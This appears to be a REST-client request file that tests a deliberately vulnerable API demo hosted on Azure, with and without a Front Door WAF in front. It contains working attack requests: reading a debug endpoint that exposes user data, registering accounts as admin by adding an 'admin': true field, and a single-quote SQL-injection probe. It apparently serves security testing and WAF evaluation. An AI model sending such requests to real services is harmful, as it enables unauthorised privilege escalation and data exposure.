
GET https://kvaesvampiinsecure.azurewebsites.net/createdb

### List the users

GET https://kvaesvampiinsecure.azurewebsites.net/users/v1 HTTP/1.1

### List debug info on the users

GET https://kvaesvampiinsecure.azurewebsites.net/users/v1/_debug HTTP/1.1

































### Create a user

POST /users/v1/register HTTP/1.1
Host: kvaesvampiinsecure.azurewebsites.net 
Accept: application/json
Content-Type: application/json
Content-Length: 51

{
  "username": "testuser",
  "email": "testuser@kvaes.be",
  "password": "securepassword"
}

### Check if it worked

GET https://kvaesvampiinsecure.azurewebsites.net/users/v1/_debug HTTP/1.1


























### Check ./api_views/users.py (line 44)
### create an admin user

POST /users/v1/register HTTP/1.1
Host: kvaesvampiinsecure.azurewebsites.net 
Accept: application/json
Content-Type: application/json
Content-Length: 51

{
  "username": "testadmin",
  "email": "testadmin@kvaes.be",
  "password": "securepassword",
  "admin": true
}

### Check if it worked

GET https://kvaesvampiinsecure.azurewebsites.net/users/v1/_debug HTTP/1.1




































### List Users via FrontDoor

GET https://kvaestestvampi-g3dsbehwaghrgadx.b01.azurefd.net/insecure/users/v1/_debug HTTP/1.1

### Create an admin user via FrontDoor

POST /users/v1/register HTTP/1.1
Host: kvaesvampiinsecure.azurewebsites.net 
Accept: application/json
Content-Type: application/json
Content-Length: 51

{
  "username": "testwafadmin",
  "email": "testwafadmin@kvaes.be",
  "password": "securepassword",
  "admin": true
}

### Check if it worked

GET https://kvaestestvampi-g3dsbehwaghrgadx.b01.azurefd.net/insecure/users/v1/_debug HTTP/1.1

















### Check ./models/user_mode.py (line 71)
### Check for SQL Injection Feasability (use a browser)

### Check for SQL Injection Feasability (use a browser) -Part 1
GET https://kvaesvampiinsecure.azurewebsites.net/users/v1/testwafadmin HTTP/1.1


### Check for SQL Injection Feasability (use a browser) -The sequel
GET https://kvaesvampiinsecure.azurewebsites.net/users/v1/name' HTTP/1.1